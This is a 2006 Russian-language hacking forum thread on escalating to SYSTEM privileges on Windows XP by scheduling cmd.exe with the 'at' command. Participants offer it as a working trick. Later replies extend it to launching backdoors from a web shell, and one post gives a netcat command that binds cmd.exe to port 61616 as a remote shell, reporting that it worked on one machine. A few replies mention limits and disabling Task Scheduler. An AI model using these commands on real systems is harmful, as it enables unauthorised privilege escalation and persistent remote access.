получение системных привилегий под вин без сторонних утилит

Discussion in 'Уязвимости' started by darky, 31 Oct 2006.

  1. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Веселая довольно-таки фишка.
    не знал про это честно..

    что делает чел..

    заходит под левым акком. дальше cmd.exe
    т.е. он ставим задачу на открытие цмд через минуту...

    проходит минута.. открываается ком. строка... но! уже с системными привилегиями!! =)))
    челу ничего не остается как.. убить свой explorer.exe.. и загрузить через ту где привилегии новый.. вот и все.. проще простого..

    бред-небред но все же )

    PS работает не от геста, а от простого непревилегированного юзера.+ самого админа естесно win xp he sp2 + full patched.. джае если послденее то system вроде как выше чем обычный админ..
     
    #1 darky, 31 Oct 2006
    Last edited: 31 Oct 2006
    2 people like this.
  2. m0le[x]

    m0le[x] Wardriver

    Joined:
    25 Oct 2006
    Messages:
    759
    Likes Received:
    576
    Reputations:
    105
    Прикольно) тоже не знал...
     
  3. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Не знал... Хмммммм =)
     
  4. TaNkist

    TaNkist Elder - Старейшина

    Joined:
    6 Apr 2006
    Messages:
    147
    Likes Received:
    47
    Reputations:
    19
    Под ограниченной учетной записью не пашет.
     
  5. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    А... я вот пробовал. И не раз. А так вещица, то занимательная...
     
  6. banall

    banall New Member

    Joined:
    25 Jun 2006
    Messages:
    55
    Likes Received:
    3
    Reputations:
    0
    Если допустим есть веб-шелл, можно ли на удаленной машине так же запускать бакдооры с правами системы?
     
  7. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    C:/folder/>at 20:22 /interactive "cmd.exe backdoor.exe"
     
  8. TaNkist

    TaNkist Elder - Старейшина

    Joined:
    6 Apr 2006
    Messages:
    147
    Likes Received:
    47
    Reputations:
    19
    Если у тебя есть права админа, то да. Если же веб-сервер запушен под ограниченной учетной записью, то скорее всего нет
     
  9. Deem3n®

    Deem3n® RTFMSDN

    Joined:
    19 Sep 2005
    Messages:
    378
    Likes Received:
    153
    Reputations:
    164
    Если вырубить сервис Task Scheduler - работать не будет.
     
    #9 Deem3n®, 2 Nov 2006
    Last edited: 2 Nov 2006
    1 person likes this.
  10. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    вырубить этот сервис - чисто параноя ) можно еще все порты закрыть на всякий случай )
     
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    C:/folder/>at 20:22 /interactive "cmd.exe c:/system32/nc.exe -L -p 61616 -e cmd.exe"
    У меня на 1 тачке прокатило с web шела.